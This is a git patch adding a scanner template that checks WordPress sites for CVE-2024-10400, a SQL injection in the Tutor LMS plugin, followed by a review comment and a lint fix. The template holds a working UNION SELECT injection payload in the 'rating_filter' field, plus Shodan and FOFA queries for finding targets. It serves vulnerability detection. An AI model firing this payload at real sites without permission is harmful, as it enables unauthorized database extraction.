From e61785e228fc7184457c635f804508bb06a02157 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Wed, 18 Dec 2024 18:00:22 +0530
Subject: [PATCH 1/2] Create CVE-2024-10400.yaml
---
 http/cves/2024/CVE-2024-10400.yaml | 67 ++++++++++++++++++++++++++++++
 1 file changed, 67 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-10400.yaml
diff --git a/http/cves/2024/CVE-2024-10400.yaml b/http/cves/2024/CVE-2024-10400.yaml
new file mode 100644
index 00000000000..e41b646f944
--- /dev/null
+++ b/http/cves/2024/CVE-2024-10400.yaml
@@ -0,0 +1,67 @@
+id: CVE-2024-10400
+
+info:
+ name: Tutor LMS <= 2.7.6 - SQL Injection
+ author: iamnoooob,rootxharsh,pdresearch
+ severity: high
+ description: |
+ The Tutor LMS plugin for WordPress is vulnerable to SQL Injection via the ‘rating_filter’ parameter in all versions up to, and including, 2.7.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor/tutor-lms-276-unauthenticated-sql-injection-via-rating-filter
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-10400
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2024-10400
+ cwe-id: CWE-89
+ cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*
+ metadata:
+ verified: true
+ max-request: 2
+ vendor: themeum
+ product: tutor_lms
+ framework: wordpress
+ shodan-query: html:"/wp-content/plugins/tutor/"
+ fofa-query: body="/wp-content/plugins/tutor/"
+ tags: cve,cve2024,tutor-lms,lms,sqli
+
+variables:
+ num: '999999999'
+
+http:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+
+ extractors:
+ - type: regex
+ part: body
+ internal: true
+ name: nonce
+ group: 1
+ regex:
+ - '"_tutor_nonce":"([a-z0-9]+)"'
+
+ - raw:
+ - |
+ POST /wp-admin/admin-ajax.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ action=load_filtered_instructor&_tutor_nonce={{nonce}}&rating_filter=1e0+and+1=0+Union+select+111,2222,3333,4,5,6,7,8,9,concat(md5({{num}}),version()),11,12,14--+-
+
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '{{md5(num)}}'
+ - '"success":true'
+ condition: and
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - 'alt=\\".*?:(.*?)\\"'
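Review bot: The second request depends on `{{nonce}}` being pulled from the front page by the first extractor, but nothing in the template records that assumption, so on a site where the Tutor script (and its `_tutor_nonce` value) is not emitted on `/` the check produces no finding and the operator cannot tell a missing nonce from an unaffected target. A one-line YAML comment above the first `extractors:` block, e.g. `# nonce is read from the front page; if _tutor_nonce is absent there the POST cannot be verified and the target is reported clean`, would make that false-negative mode explicit. The `tags` line also omits the `wordpress,wp-plugin` tags that other WordPress plugin templates in this repository appear to carry, so a scan filtered by those tags would skip this template; `tags: cve,cve2024,wordpress,wp-plugin,tutor-lms,lms,sqli` would follow that convention.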
From 4f7b06b180a2b5516311e5364df218bf78e8ee43 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Wed, 18 Dec 2024 18:04:04 +0530
Subject: [PATCH 2/2] lint dfix
---
 http/cves/2024/CVE-2024-10400.yaml | 14 +++++++-------
 1 file changed, 7 insertions(+), 7 deletions(-)
diff --git a/http/cves/2024/CVE-2024-10400.yaml b/http/cves/2024/CVE-2024-10400.yaml
index e41b646f944..05ad8ea766a 100644
--- a/http/cves/2024/CVE-2024-10400.yaml
+++ b/http/cves/2024/CVE-2024-10400.yaml
@@ -35,13 +35,13 @@ http: Host: {{Hostname}} extractors: - - type: regex - part: body - internal: true - name: nonce - group: 1 - regex: - - '"_tutor_nonce":"([a-z0-9]+)"' + - type: regex + part: body + internal: true + name: nonce + group: 1 + regex: + - '"_tutor_nonce":"([a-z0-9]+)"' - raw: - |